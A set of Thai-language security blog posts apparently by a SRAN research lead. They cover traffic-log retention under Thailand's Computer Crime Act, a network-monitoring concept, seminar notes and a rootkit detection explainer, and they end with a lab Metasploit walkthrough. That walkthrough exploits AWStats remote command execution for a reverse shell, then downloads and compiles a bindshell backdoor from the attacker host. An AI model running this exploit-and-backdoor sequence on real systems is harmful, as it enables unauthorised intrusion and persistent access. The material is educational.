โดยมีประกาศกระทรวงเทคโนโลยีสารสนเทศและการสื่อสาร เรื่อง หลักเกณฑ์การเก็บรักษาข้อมูลจราจรทางคอมพิวเตอร์ของผู้ให้บริการ ปี 2550 ซึ่งมีสาระสำคัญกล่าวว่า “ข้อมูลจราจรทางคอมพิวเตอร์นับเป็นพยานหลักฐานสำคัญในการดำเนินคดี อันเป็นประโยชน์อย่างยิ่งต่อการสืบสวน สอบสวน เพื่อนำตัวผู้กระทำความผิดมาลงโทษ จึงสมควรกำหนดให้ผู้ให้บริการมีหน้าที่ในการเก็บรักษาข้อมูลจราจรทางคอมพิวเตอร์ดังกล่าว” ซึ่งระบบเก็บรักษาความลับของข้อมูลที่จัดเก็บ มีการกำหนดชั้นความลับในการเข้าถึงข้อมูลดังกล่าว เพื่อรักษาความน่าเชื่อถือของข้อมูล และไม่ให้ผู้ดูแลระบบสามารถแก้ไขข้อมูลที่เก็บรักษาไว้ เช่น การเก็บไว้ใน Centralized Log Server หรือการทำ Data Archiving หรือ Data Hashing
แนวทางการสืบหาผู้กระทำผิด (Chain of Event) ตาม พ.ร.บ. คอมพิวเตอร์
1. Who ใคร
2. What ทำอะไร
3. Where ที่ไหน
4. When เวลาใด
5. Why อย่างไร
เนื่องจากรับส่งข้อมูลผ่านเครือข่ายคอมพิวเตอร์ เป็น Real Time ไม่สามารถดูย้อนหลังได้ การที่จะสามารถดูย้อนหลังได้ ต้องมีการเก็บบันทึกข้อมูล ที่เรียกว่า Log และเพื่อเก็บรักษาข้อมูลดังกล่าว
และป้องกันไม่ให้หลักฐานข้อมูลนั้นเปลี่ยนแปลงได้ จึงควรมีการทำ Chain of Custody คือเก็บบันทึกรักษาข้อมูลจราจรขึ้น และนี้เองคือสาระสำคัญของการออกกฏหมายฉบับนี้เพื่อป้องปราบ และเก็บบันทึกหลักฐาน เพื่อสืบสวนสอบสวน หาผู้กระทำผิดมาลงโทษ ดังนั้นการจัดหาเทคโนโลยีเพื่อเก็บรักษาหลักฐานข้อมูล เป็นเรื่องที่ซับซ้อน เราจึงมีแนวคิดเพื่อจัดหาเทคโนโลยีมาแก้ไขปัญหา และลดความซับซ้อนนี้ขึ้น เรียกว่า ” การสร้างเครือข่ายตื่นรู้ ”
2. คำนิยามการสร้างเครือข่ายตื่นรู้ องค์ประกอบสำคัญในด้านความมั่นคงปลอดภัยทางข้อมูลสารสนเทศ คือ เทคโนโลยี คน และ กระบวนการ สิ่งที่สามารถ ควบคุมได้ง่ายที่สุดคือ เรื่องเทคโนโลยี ถึงแม้จะไม่มีเทคโนโลยีใดทที่ทำงานแทนคนได้หมด และไม่มีเทคโนโลยีใดที่ป้องกันภัยคุกคามได้สมบูรณ์แบบ หากเราควบคุมเทคโนโลยีที่นำมาใช้ได้ และรู้ทันปัญหาที่เกิดขึ้น ประหยัดงบประมาณในการทุน ใช้ได้อย่างคุ้มค่า เราก็สามารถนำส่วนที่ต้องลงทุนทางเทคโนโลยีที่เหลือใช้ มาอบรมเจ้าหน้าที่พนักงานให้เกิดองค์ความรู้ และ จัดหากระบวนการเพื่อสร้างมาตรฐานด้านความมั่นคงปลอดภัยทางข้อมูลสารสนเทศ ได้อย่างมีทิศทางมากขึ้น ดังนั้นในการสร้างเครือข่ายตื่นรู้จึงเป็นการ สรุปการจัดหาเทคโนโลยี มารองรับเครือข่ายคอมพิวเตอร์ เพื่อจัดหาเทคโนโลยีด้านความมั่นคงปลอดภัยทางข้อมูล สมบูรณ์แบบ ที่เราสามารถระบุตัวตนของผู้ใช้งาน ระบุลักษณะการใช้งาน และบันทึกข้อมูลการใช้งานตามความเหมาะสมที่เกิดขึ้น สามารถยืนยันหลักฐานเพื่อใช้ในการสืบสวนสอบสวนหาผู้กระทำผิดทางคอมพิวเตอร์ ทั้งในองค์กร และนอกองค์กรได้อย่างมีความสะดวกมากขึ้น มีประสิทธิภาพ และมีประสิทธิผลตามมา
3. จุดประสงค์การสร้างเครือข่ายตื่นรู้
3.1 ลดค่าใช้จ่ายในการนำเทคโนโลยีด้านความปลอดภัยข้อมูล มาใช้เพื่อรองรับกับ พ.ร.บ. ว่าด้วยการกระทำผิดทางคอมพิวเตอร์
3.2 เพื่อทราบถึงที่มาที่ไปของภัยคุกคามที่อาจเกิดขึ้นภายในองค์กร
3.3 เพื่อระบุตัวตนการใช้งาน และเก็บบันทึกประวัติพฤติกรรมการใช้งานบนเครือข่ายคอมพิวเตอร์
3.4 เพื่อจัดทำเป็นโครงสร้างในการออกแบบเครือข่ายให้ปลอดภัยอย่างยั้งยืน
4. องค์ประกอบ เครือข่ายตื่นรู้ (Energetic Network)
4.1 การจัดเก็บคลังข้อมูล (Inventory)
4.2 การระบุตัวตน (Identity)
4.3 การเฝ้าระวังและวิเคราะห์ผล (Monitoring & Analysis)
4.4 การควบคุม (Control)
4.5 การจัดเก็บเหตุการณ์เพื่อเปรียบเทียบตามมาตรฐาน (Compliance)
พบกันตอนหน้า จะอธิบายรายละเอียดในแ่ต่ละส่วน และแนวทางปฏิบัติ
นนทวรรธนะ สาระมาน
Nontawattana Saraman
หัวหน้าทีมพัฒนาวิจัยเทคโนโลยี SRAN
สำนักงานส่งเสริมอุตสาหกรรมซอฟต์แวร์แห่งชาติ (SIPA) จัดงานสัมมนา “แผนส่งเสริมการใช้ซอฟต์แวร์โอเพนซอร์สในภาครัฐ” สำหรับองค์กรธุรกิจหรือหน่วยงานราชการ โดยงานนี้จะจัดในวันนี้ 24 มกราคม 2551 ที่จะถึงนี้ ที่ห้องบอลรูมl โรงแรมดิเอ็มเมอรัลด์
นายนนทวรรธนะ สาระมาน หัวหน้าทีมพัฒนาระบบ SRAN ได้กล่าวบรรยายหัวข้อซอฟต์แวร์โอเพนซอร์สกับความมั่นคงปลอดภัยของข้อมูลในภาครัฐ ได้กล่าวถึงการทำเครือข่ายตื่นรู้ (Energetic Network) ซึ่งเป็นแนวคิดใหม่ ที่นำ Open Source มาใช้ประยุกต์กับระบบรักษาความปลอดภัยทางข้อมูล ไม่ว่าเป็นการทำ การเก็บคลังข้อมูล (Inventory), การระบุตัวตน (Identity) , การเฝ้าระวังและวิเคราะห์ผล (Monitoring & Analysis) , การควบคุมข้อมูล (Controlled) , และการเปรียบเทียบตามมาตราฐาน (Compliance) อย่างเป็นรูปธรรมและลดความซับซ้อนของเทคโนโลยีได้
และ SRAN ได้มีการจัดบูธให้ความรู้เทคโนโลยีด้านความปลอดภัยข้อมูลเพื่อรองรับกับ พ.ร.บ. ว่าด้วยการกระทำผิดทางคอมพิวเตอร์อีกด้วย
นนทวรรธนะ สาระมาน
Nontawattana Saraman
วันที่ 11 มกราคม 2551 ได้บรรยายการหาเทคโนโลยีมารองรับ พ.ร.บ. คอมพ์ฯ โดยใช้ระบบ SRAN Security Center ทางเลือกใหม่ในการเก็บบันทึกข้อมูลจราจร ให้สอดคล้องกับ พระราชบัญญัติว่าด้วยการกระทำความผิดเกี่ยวกับคอมพิวเตอร์ ให้กับ พนักงานที่ดูแลระบบไอที ทั่วประเทศของกรมชลประทาน บรรยายที่สำนักงานใหญ่กรมชลประทาน
ในการบรรยายในครั้งนี้ พูดถึง การเก็บ Log ตาม พ.ร.บ ตามความจำเป็นและพอเพียง
1. สาระสำคัญในการเก็บบันทึกข้อมูลจราจร (Log) เพื่อระบุตัวตน ใคร ทำอะไร ที่ไหน อย่างไร เวลาใด
2. เทคโนโลยีที่ใช้ให้สอดคล้องกับ พ.ร.บ คอมพิวเตอร์ และใช้งบประมาณแบบพอเพียง สะดวกในการใช้งาน ลดความซับซ้อน
2. ใช้เทคนิค NBA (Network Behaviors Analysis) และเทคนิค Flow Collector บนระบบ SRAN เพื่อจับเพื่อดูพฤติกรรมการใช้งานของเครื่อง Client ที่ออกสู่อินเตอร์เน็ท (ส่วนใหญ่ภัยคุกคาม ที่มีผลกระทบกับ กฏหมายฉบับนี้มักเกิดจากการใช้งานอินเตอร์เน็ท) ทั้งที่เป็นข้อมูลปกติ และข้อมูลไม่ปกติ พร้อมทั้งการทำ Data Hashing การจัดทำ NTP (Time Server) และการยืนยันความไม่เปลี่ยนแปลงข้อมูลจราจรที่เก็บบันทึกไว้
3. ใช้ syslog server เก็บ Log เฉพาะ เครื่องแม่ข่ายที่สำคัญ และอุปกรณ์ที่สำคัญ
เพื่อรองรับใน มาตรา 3 และ มาตรา 26
4. อธิบายแนวคิด Hybrid Log Recorder นับได้ว่าเป็นที่แรกที่ได้บรรยายแนวคิดนี้
ในการบรรยายในครั้งนี้ พูดถึง การเก็บ Log ตาม พ.ร.บ ตามความจำเป็นและพอเพียง
1. สาระสำคัญในการเก็บบันทึกข้อมูลจราจร (Log) เพื่อระบุตัวตน ใคร ทำอะไร ที่ไหน อย่างไร เวลาใด
2. เทคโนโลยีที่ใช้ให้สอดคล้องกับ พ.ร.บ คอมพิวเตอร์ และใช้งบประมาณแบบพอเพียง สะดวกในการใช้งาน ลดความซับซ้อน
2. ใช้เทคนิค NBA (Network Behaviors Analysis) และเทคนิค Flow Collector บนระบบ SRAN เพื่อจับเพื่อดูพฤติกรรมการใช้งานของเครื่อง Client ที่ออกสู่อินเตอร์เน็ท (ส่วนใหญ่ภัยคุกคาม ที่มีผลกระทบกับ กฏหมายฉบับนี้มักเกิดจากการใช้งานอินเตอร์เน็ท) ทั้งที่เป็นข้อมูลปกติ และข้อมูลไม่ปกติ พร้อมทั้งการทำ Data Hashing การจัดทำ NTP (Time Server) และการยืนยันความไม่เปลี่ยนแปลงข้อมูลจราจรที่เก็บบันทึกไว้
3. ใช้ syslog server เก็บ Log เฉพาะ เครื่องแม่ข่ายที่สำคัญ และอุปกรณ์ที่สำคัญ
เพื่อรองรับใน มาตรา 3 และ มาตรา 26
4. อธิบายแนวคิด Hybrid Log Recorder นับได้ว่าเป็นที่แรกที่ได้บรรยายแนวคิดนี้
หลังปีใหม่ไม่กี่วัน ผมได้จัดข้อมูลในคอมพิวเตอร์ใหม่ ได้พบบทความที่ได้เขียนไว้ เมื่อหลายปีและคิดว่ายังคงได้สาระความรู้อยู่ในยุคปัจจุบันจึงนะมาให้อ่านกัน
ภัยคุกคามที่มองไม่ (Invisible Threat)
ภัยคุกคามเป็นเรื่องต้องระวังอยู่ตลอดเวลา พูดง่ายๆว่าต้องมีสติในการใช้งาน ครั้งนี้ผมจะกล่าวถึงภัยคุกคามชนิดหนึ่ง ที่มองด้วยตาเปล่าไม่เห็น เป็นภัยคุกคามบนระบบคอมพิวเตอร์นี้เองครับ และเป็นศัพท์เทคนิคที่หลายคนยังสับสนอยู่ว่าคืออะไรกันแน่ “Root Kit” โดยผมแบ่งหัวข้อไว้ดังนี้
1.ชนิดของ Rootkit
2.การตรวจหา rootkit
3.การกำจัด rootkit
4.ความแตกต่างของ Rootkit ไวรัสคอมพิวเตอร์และเวิร์ม
5. rootkit ที่ดาวน์โหลดได้ในอินเทอร์เน็ต
1. ชนิดของ rootkit
rootkit มีสามแบบด้วยกันคือ rootkit ในระดับ kernel, library และ application ในระดับ kernel rootkit เพิ่มโค้ดและ/หรือแทนที่บางส่วนของโค้ดของ kernel ด้วยโค้ดที่แก้ไขแล้วเพื่อช่วยในการซ่อน backdoor ในระบบคอมพิวเตอร์ มักทำโดยการเพิ่มโค้ดใหม่เข้าไปใน kernel ผ่านทาง device driver หรือ loadable module เช่น Loadable Kernel Modules ในลีนุกซ์หรือ device drivers ในไมโครซอฟท์วินโดวส์ โดยทั่วไป kernel rootkit จะ แก้ไขหรือแทนที่ system calls ด้วยเวอร์ชั่นที่ซ่อนข้อมูลเกี่ยวกับผู้โจมตี ส่วน rootkit ในระดับ application อาจแทนที่ไฟล์ไบนารีของ application ด้วยไฟล์ปลอมที่ซ่อนโทรจันไว้ หรืออาจแก้ไขการทำงานของ application โดยใช้ hook, patch, inject code หรือวิธีอื่น ๆ rootkit ในระดับ kernel อาจมีอันตรายมากเนื่องจากตรวจพบได้ยากถ้าไม่ได้ใช้ซอฟท์แวร์ที่เหมาะสมเพื่อค้นหา
ตัวอย่าง
* Rootkit.com มีตัวอย่างของ rootkits จำนวนมาก
* Sony BMG ใช้ XCP (Extended Copy Protection) DRM ของ First 4 Internet
2. การตรวจหา rootkit
มีข้อจำกัดสำหรับโปรแกรมใด ๆ ที่พยายามตรวจหา rootkit ในขณะที่ rootkit กำลังทำงานอยู่ในระบบที่สงสัย rootkit เป็นชุดของโปรแกรมที่แก้ไขเครื่องมือและ library ที่ทุกโปรแกรมต้องใช้ rootkit บางตัวแก้ไข kernel ที่ทำงานอยู่ (ผ่านทาง loadable modules ในลีนุกซ์ และรูปแบบอื่น ๆ ในยูนิกซ์ ผ่านทาง VxD ซึ่งเป็น virtual external driver ในแพลตฟอร์มวินโดวส์ของไมโครซอฟท์) ปัญหาเบื้องต้นในการตรวจจับ rootkit คือเราไม่สามารถให้ความเชื่อถือระบบปฏิบัติการที่กำลังทำงานอยู่ได้ พูดในอีกแง่หนึ่งคือ การกระทำเช่นการดูรายชื่อโปรเซสที่กำลังทำงาน หรือรายชื่อไฟล์ทุกไฟล์ในไดเร็กทอรีหนึ่ง เราไม่สามารถเชื่อถือได้ว่ามันได้ทำงานอย่างที่ผู้ออกแบบตั้งใจให้เป็น ในปัจจุบันโปรแกรมตรวจ rootkit ที่ทำงานใน live system เป็นเพียงวิธีเดียวที่ได้ผลเนื่องจาก rootkit ยังไม่ได้รับการพัฒนาให้ซ่อนตัวมันอย่างเต็มที่
วิธีที่ดีและน่าเชื่อถือที่สุดสำหรับการตรวจหา rootkit คือการปิดคอมพิวเตอร์ที่สงสัยว่าถูกติดตั้ง rootkit แล้วจึงตรวจพื้นที่เก็บข้อมูลโดยการบู๊ต (boot) จากสื่ออื่น (เช่น rescue CD-ROM, USB flash drive) rootkit ที่ไม่ได้ทำงานอยู่จะไม่สามารถซ่อนตัวเองได้ และโปรแกรมแอนตี้ไวรัสจะสามารถค้นหา rootkit ที่ติดตั้งผ่านทาง OS calls มาตรฐาน (ซึ่งน่าจะถูกแก้ไขโดย rootkit) และ query ในระดับต่ำ ซึ่งยังน่าเชื่อถือได้ rootkit พยายามป้องกันจากการค้นพบโดยการเฝ้าดูโปรเซสที่ทำงานอยู่และหยุดกิจกรรมของพวกมันจนกระทั่งการสแกนเสร็จสิ้น เนื่องจาก rootkit scanner ไม่สามารถค้นหา malware ที่ไม่มีระบบซ่อนตัวเองได้
ผู้ผลิตภัณฑ์ด้านความปลอดภัยได้แก้ไขปัญหาโดยการรวมระบบตรวจจับ rootkit ลงไปในผลิตภัณฑ์แอนตี้ไวรัสแบบดั้งเดิม ถ้า rootkit ตัดสินใจที่จะซ่อนตัวเองในระหว่างขั้นตอนการสแกน มันจะถูกตรวจพบโดยซอฟท์แวร์ตรวจจับการซ่อนตัวเอง แต่ถ้ามันตัดสินใจที่จะยกเลิกการโหลดเข้าสู่ระบบ แอนตี้ไวรัสแบบดั้งเดิมก็สามารถค้นหาพบได้โดยการตรวจจาก fingerprint การป้องกันที่ใช้ทั้งสองวิธีแบบนี้อาจบังคับผู้โจมตีให้ใช้ระบบตอบโต้การโจมตี (เรียกว่า retro routines) ในโค้ดของ rootkit ที่จะบังคับให้ลบซอฟท์แวร์ด้านความปลอดภัยออกจากหน่วยความจำ ทำให้โปรแกรมแอนตี้ไวรัสไม่สามารถทำงานได้ เช่นเดียวกันกับไวรัสคอมพิวเตอร์
มีหลายโปรแกรมที่สามารถตรวจจับ rootkit ในระบบยูนิกซ์มีโปรแกรมสองตัวที่นิยมใช้คือ chkrootkit และ rkhunter สำหรับแพลตฟอร์มวินโดวส์ มีโปรแกรมฟรีสำหรับใช้ส่วนบุคคลชื่อ Blacklight เป็นเวอร์ชั่นเบต้าในเว็บไซต์ของ F-Secure อีกโปรแกรมหนึ่งคือ Rootkit Revealer จาก Sysinternals มันจะตรวจจับ rootkit ที่มีทั้งหมดในปัจจุบันโดยการเปรียบเทียบผลที่ได้จากระบบปฏิบัติการกับผลที่ได้จากการอ่านดิสก์ อย่างไรก็ตามrootkit บางตัวใช้การเพิ่มโปรแกรมเหล่านี้เข้าไปในรายการของไฟล์ที่มันไม่ได้ซ่อนไว้ ดังนั้นเมื่อ rootkit ทำให้ไม่เกิดความแตกต่างระหว่างรายการไฟล์ทั้งสองรายการ โปรแกรมตรวจจับจึงไม่รายงานความผิดปกติ อย่างไรก็ตามการเปลี่ยนชื่อไฟล์ rootkitrevealer.exe เป็นชื่อแบบสุ่มสามารถเอาชนะฟีเจอร์นี้ของ rootkit ได้ ในรีลีสล่าสุดของ Rkdetector และ Rootkit Revealer มีฟีเจอร์ที่เปลี่ยนชื่อไฟล์อยู่แล้วดังนั้นจึงไม่จำเป็นต้องเปลี่ยนชื่อไฟล์ด้วยตัวคุณเองอีกต่อไป
Chkrootkit
http://www.chkrootkit.org/
Rkhunter
http://www.rootkit.nl/
Blacklight
http://www.f-secure.com/blacklight/
Rootkit Revealer
http://www.sysinternals.com/Utilities/RootkitRevealer.html
Rkdtector
http://www.rootkitdetector.com/
หลักการป้องกันไว้ดีกว่าแก้ยังใช้ได้เสมอ ถ้าคุณเชื่อในความถูกต้องของแผ่นติดตั้งของระบบ คุณสามารถใช้การเข้ารหัสเพื่อเฝ้าดูความถูกต้องของระบบ โดยการทำ fingerprinting ไฟล์ระบบทันทีหลังจากมีการติดตั้งระบบใหม่ ๆ และทำอีกครั้งเมื่อมีการเปลี่ยนแปลงไฟล์ระบบ (เช่น การติดตั้งซอฟท์แวร์ใหม่) ทำให้คุณรู้ได้เมื่อมีการเปลี่ยนแปลงที่เป็นอันตรายกับไฟล์ระบบของคุณ ในขั้นตอนการทำ fingerprint จะมีการใช้ cryptographic hash function เพื่อสร้างตัวเลขที่มีความยาวจำกัด มีเอกลักษณ์เฉพาะขึ้นอยู่กับทุกบิตของข้อมูลที่มีในไฟล์ที่ทำ fingerprint คุณสามารถตรวจจับการเปลี่ยนแปลงใด ๆ กับไฟล์เหล่านี้ที่คุณไม่ได้ทำ โดยการคำนวณและเปรียบเทียบค่า hash (หรือ fingerprint) ของไฟล์เป็นระยะ ๆ
3. การกำจัด rootkit
มีความคิดที่เชื่อว่าการกำจัด rootkit ออกจากระบบไม่สามารถทำได้ ถึงแม้จะรู้ถึงลักษณะที่แท้จริงและองค์ประกอบของ rootkit ก็ตาม การใช้เวลาและความพยายามของผู้ดูแลระบบโดยใช้ทักษะหรือประสบการณ์ที่จำเป็นเพื่อการติดตั้งระบบปฏิบัติการใหม่ตั้งแต่ต้นเป็นทางเลือกที่ดีกว่า
Rootkit Question
http://forums.spywareinfo.com/lofiversion/index.php/t52360.html
มีวิธีการลบ rootkit โดยการใช้ filesystem driver เมื่อระบบกำลังทำงานอยู่ Rkdetector v2.0 ใช้วิธีลบไฟล์ที่ซ่อนอยู่เมื่อระบบกำลังทำงานอยู่โดยใช้ NTFS และ FAT32 filesystem driver ของมันเอง หลังจากลบไฟล์และระบบบู๊ตขึ้นมาใหม่แล้ว ไฟล์ของ rootkit จะไม่สามารถโหลดขึ้นมาได้เพราะข้อมูลที่มีอยู่เสียหายไปแล้ว
4. ความแตกต่างของ Rootkit ไวรัสคอมพิวเตอร์และเวิร์ม
ความแตกต่างหลัก ๆ ของไวรัสคอมพิวเตอร์และ rootkit คือการแพร่กระจาย ไวรัสคอมพิวเตอร์เหมือน rootkit ตรงที่พวกมันแก้ไขซอฟท์แวร์ที่เป็นองค์ประกอบหลักของระบบ โดยการใส่โค้ดที่พยายามซ่อนการติดตั้ง และช่วยเพิ่มฟีเจอร์หรือ service บางอย่างให้กับผู้โจมตี (เป็น payload ของไวรัส)
ในกรณีของ rootkit payload อาจพยายามรักษาความถูกต้องสมบูรณ์ของ rootkit (การพยายามควบคุมระบบ)เช่น ทุกครั้งที่ผู้ใช้ใช้คำสั่ง ps ที่เป็นของ rootkit มันอาจตรวจ copy ของ init และ inetd ในระบบเพื่อให้แน่ใจว่าระบบยังคงถูกควบคุมโดย rootkit อยู่ และอาจติดตั้ง rootkit ลงในระบบอีกครั้งตามความจำเป็น ส่วนที่เหลือของ payload มีไว้เพื่อตรวจให้แน่ใจว่าผู้บุกรุกยังคงควบคุมระบบอยู่ โดยทั่วไปรวมถึงการมี backdoor ในรูปแบบของ username /password ที่สามารถเข้าสู่ระบบได้ command-line switch ที่ซ่อนไว้ หรือ environment variable พิเศษซึ่งสามารถหลบหลีกระบบ access control policy ของโปรแกรมที่ไม่ได้ถูกแก้ไขโดย rootkit ได้ rootkit บางตัวอาจเพิ่มการตรวจ port knocking เข้าไปใน network daemon (services) เช่น inetd หรือ sshd
port knocking วิธีการเปิดพอร์ตในไฟร์วอลล์โดยการสร้างความพยายามในการเชื่อมโยงเข้าไปที่พอร์ตที่ปิดอยู่ตามที่กำหนดไว้ หลังจากที่ได้รับความพยายามในการเชื่อมโยงตามลำดับที่ถูกต้องมาแล้ว จะมีการแก้ไขข้อบังคับของไฟร์วอลล์อนุญาตให้โฮสต์นั้นสามารถเชื่อมโยงกับพอร์ตนั้นได้)
ไวรัสคอมพิวเตอร์อาจมี payload แบบใดก็ได้ อย่างไรก็ตาม ไวรัสคอมพิวเตอร์อาจพยายามแพร่กระจายไปยังระบบอื่นอีกด้วย ส่วน rootkit นั้นโดยทั่วไปแล้วจะจำกัดอยู่ที่การควบระบบเพียงระบบเดียวเท่านั้น
โปรแกรมหนึ่งหรือชุดโปรแกรมที่พยายามสแกนเครือข่ายเพื่อหาระบบที่มีช่องโหว่ โจมตีช่องโหว่และบุกรุกเข้าระบบเหล่านั้นโดยอัตโนมัติ เรียกว่า หนอนคอมพิวเตอร์ (computer worm) รูปแบบอื่น ๆ ของหนอนคอมพิวเตอร์อาจทำงานในลักษณะ passive เช่น ดักจับข้อมูล username และ password และใช้ข้อมูลนี้เพื่อบุกรุกแอคเคาท์ ติดตั้งสำเนาของตัวมันเองลงไปในแต่ละแอคเคาท์ (และมักส่งข้อมูลแอคเคาท์กลับมายังผู้บุกรุกผ่านทาง covert channel)
covert channel หมายถึงช่องการสื่อสารใด ๆ (channel) ที่สามารถถูกใช้ประโยชน์โดยโปรเซสหนึ่ง เพื่อส่งผ่านข้อมูลข่าวสารในลักษณะที่ละเมิดข้อกำหนดในการรักษาความปลอดภัยของระบบ
นอกจากนี้ยังมีซอฟท์แวร์มุ่งร้ายแบบ hybrid หนอนอินเทอร์เน็ตอาจติดตั้ง rootkit และ rootkit อาจทำมีสำเนาของหนอนอินเทอร์เน็ต, packet sniffer หรือ pot scanner หนึ่งตัวหรือมากกว่า นอกจากนี้ยังมีหนอนอินเทอร์เน็ตที่แพร่กระจายผ่านอีเมล ที่โจมตีแพลตฟอร์มไมโครซอฟท์วินโดวส์โดยเฉพาะ ที่มักเรียกกันว่าไวรัส ดังนั้นคำเหล่านี้จึงมักใช้คาบเกี่ยวกัน และถูกเหมารวมได้ง่าย
5. rootkit ที่ดาวน์โหลดได้ในอินเทอร์เน็ต
rootkit ก็เหมือนกับซอฟท์แวร์อื่น ๆ ที่ใช้โดยผู้โจมตี มีเครื่องมือหลายตัวที่ใช้ร่วมกันหลายคน และหาได้ง่ายในอินเทอร์เน็ต ไม่ใช่เรื่องแปลกที่จะพบระบบที่ถูกบุกรุกที่ถูกติดตั้ง rootkit ซับซ้อนที่สามารถหาได้ในอินเทอร์เน็ต แต่ซ่อนหนอนอินเทอร์เน็ตที่ไม่ซับซ้อน หรือเครื่องมือที่ดูเหมือนจะเขียนโดยโปรแกรมเมอร์ที่ไม่มีประสบการณ์
rootkit ส่วนใหญ่ที่หาได้ในอินเทอร์เน็ตมักสร้างเป็นโปรแกรมพิสูจน์ความคิด (proof of concept) เพื่อทดลองแนวคิดใหม่ในการซ่อนสิ่งที่ต้องการในระบบคอมพิวเตอร์ อย่างก็ตามเนื่องจากเป็นการทดลอง พวกเขาจึงมักจะไม่ได้ทำให้ rootkit สามารถซ่อนตัวได้อย่างสมบูรณ์ เมื่อใช้ rootkit เพื่อการโจมตีจึงอาจมีประสิทธิภาพมาก แต่อย่างไรก็ตาม เมื่อ rootkit ถูกค้นพบ เช่น โดยการเริ่มต้นระบบปฏิบัติการจากสื่อที่เชื่อถือได้ เช่น ซีดี จึงมักแสดงให้เห็นถึงร่องรอยของ rootkit เหล่านี้ เช่น มีไฟล์ที่ชื่อ rootkit ในไดเร็กทอรีทั่ว ๆ ไปในระบบคอมพิวเตอร์นั้น
นายนนทวรรธนะ สาระมาน
Nontawattana Saraman
ทีมพัฒนาวิจัย SRAN
Metasploit เป็นเครื่องมือแบบ open source ที่สามารถใช้เพื่อพัฒนา ทดสอบ และใช้ exploit
# wget http://www.metasploit.com/tools/framework-2.5.tar.gz
–12:48:57– http://www.metasploit.com/tools/framework-2.5.tar.gz
=> `framework-2.5.tar.gz’
Resolving www.metasploit.com… 66.234.161.200
Connecting to www.metasploit.com|66.234.161.200|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 2,625,719 (2.5M) [application/x-gzip]
100%[========================================================================================>] 2,625,719 11.23K/s ETA 00:00
12:53:14 (10.05 KB/s) – `framework-2.5.tar.gz’ saved [2625719/2625719]
แตกไฟล์โดยใช้คำสั่ง tar
# tar -zxvf framework-2.5.tar.gz
framework-2.5/
framework-2.5/lib/
framework-2.5/lib/Msf/
framework-2.5/lib/Msf/Nop/
framework-2.5/lib/Msf/Nop/OptyNop2.pm
framework-2.5/lib/Msf/Nop/OptyNop2Tables.pm
framework-2.5/lib/Msf/PayloadComponent/
framework-2.5/lib/Msf/PayloadComponent/BSD/
framework-2.5/lib/Msf/PayloadComponent/BSD/ia32/
…
framework-2.5/extras/Term-ReadLine-Gnu-1.14.tar.gz
framework-2.5/msfcli
framework-2.5/msfweb
framework-2.5/msfpayload
เข้าไปในไดเร็กทอรี framework-2.5
# cd framework-2.5
[root@ca framework-2.5]# ls
data exploits msfcli msfencode msfpescan nops src
docs extras msfconsole msflogdump msfupdate payloads tools
encoders lib msfelfscan msfpayload msfweb sdk
เรียก console
# ./msfconsole
__. .__. .__. __.
_____ _____/ |______ ____________ | | ____ |__|/ |_
/ _/ __ ____ / ___/____ | | / _ | __
| Y Y ___/| | / __ ____ | |_> > |_( <_> ) || |
|__|_| /___ >__| (____ /____ >| __/|____/____/|__||__|
/ / / / |__|
+ — –=[ msfconsole v2.5 [105 exploits – 74 payloads]
พิมพ์ help เพื่อดู option ที่สามารถใช้ได้
msf > help
Metasploit Framework Main Console Help
======================================
? Show the main console help
cd Change working directory
exit Exit the console
help Show the main console help
info Display detailed exploit or payload information
quit Exit the console
reload Reload exploits and payloads
save Save configuration to disk
setg Set a global environment variable
show Show available exploits and payloads
unsetg Remove a global environment variable
use Select an exploit by name
version Show console version
แสดง exploit ที่มี
msf > show exploits
Metasploit Framework Loaded Exploits
====================================
3com_3cdaemon_ftp_overflow 3Com 3CDaemon FTP Server Overflow
Credits Metasploit Framework Credits
afp_loginext AppleFileServer LoginExt PathName Overflow
aim_goaway AOL Instant Messenger goaway Overflow
altn_webadmin Alt-N WebAdmin USER Buffer Overflow
apache_chunked_win32 Apache Win32 Chunked Encoding
arkeia_agent_access Arkeia Backup Client Remote Access
arkeia_type77_macos Arkeia Backup Client Type 77 Overflow (Mac OS X)
arkeia_type77_win32 Arkeia Backup Client Type 77 Overflow (Win32)
awstats_configdir_exec AWStats configdir Remote Command Execution
เรียกใช้ exploit ที่โจมตี awstats
msf > use awstats_configdir_exec
msf awstats_configdir_exec(cmd_unix_reverse) > set RHOST 192.168.1.204
RHOST -> 192.168.1.204
msf awstats_configdir_exec(cmd_unix_reverse) > set DIR /cgi-bin/
DIR -> /cgi-bin/
msf awstats_configdir_exec(cmd_unix_reverse) > set LHOST 192.168.1.203
LHOST -> 192.168.1.203
msf awstats_configdir_exec(cmd_unix_reverse) > set LPORT 4321
LPORT -> 4321
แสดง option ของ exploit
msf awstats_configdir_exec(cmd_unix_reverse) > show options
Exploit and Payload Options
===========================
Exploit: Name Default Description
——– —— ————- ———————————–
optional SSL Use SSL
required RHOST 192.168.1.204 The target address
optional VHOST The virtual host name of the server
required DIR /cgi-bin/ Directory of awstats.pl script
required RPORT 80 The target port
Payload: Name Default Description
——– —— ————- ———————————–
required LHOST 192.168.1.203 Local address to receive connection
required LPORT 4321 Local port to receive connection
Target: Targetless Exploit
แสดง payload
msf awstats_configdir_exec > show payloads
Metasploit Framework Usable Payloads
====================================
cmd_generic Arbitrary Command
cmd_irix_bind Irix Inetd Bind Shell
cmd_unix_reverse Unix Telnet Piping Reverse Shell
เซ็ต payload ให้เป็น cmd_unix_reverse
msf awstats_configdir_exec(cmd_generic) > set PAYLOAD cmd_unix_reverse
PAYLOAD -> cmd_unix_reverse
msf awstats_configdir_exec(cmd_unix_reverse) > exploit
[*] Starting Reverse Handler.
[*] Establishing a connection to the target…
Trying 192.168.1.203…
Escape character is ‘^]’.
[*] Recieved first connection.
[*] Recieved second connection.
[*] Got connection from 192.168.1.203:4321 <-> 192.168.1.204:32796 192.168.1.203:4321 <-> 192.168.1.204:32797
id
uid=48(apache) gid=48(apache) groups=48(apache)
pwd
/usr/local/awstats/wwwroot/cgi-bin
ดาวน์โหลด bindshell.c ซึ่งเป็น backdoor ที่เปิดพอร์ต 4000 ไว้
cd /tmp
wget http://192.168.1.203/bindshell.c
–16:08:20– http://192.168.1.203/bindshell.c
=> `bindshell.c’
Connecting to 192.168.1.203 … connected.
HTTP request sent, awaiting response… 200 OK
Length: 2,083 [text/plain]
0K .. 100% 135.61 KB/s
16:08:20 (135.61 KB/s) – `bindshell.c’ saved [2083/2083]
ls
bindshell.c
ssh-GDMM1551
ssh-dovU4939
gcc -o bindshell bindshell.c
ls
bindshell
bindshell.c
ssh-GDMM1551
ssh-dovU4939
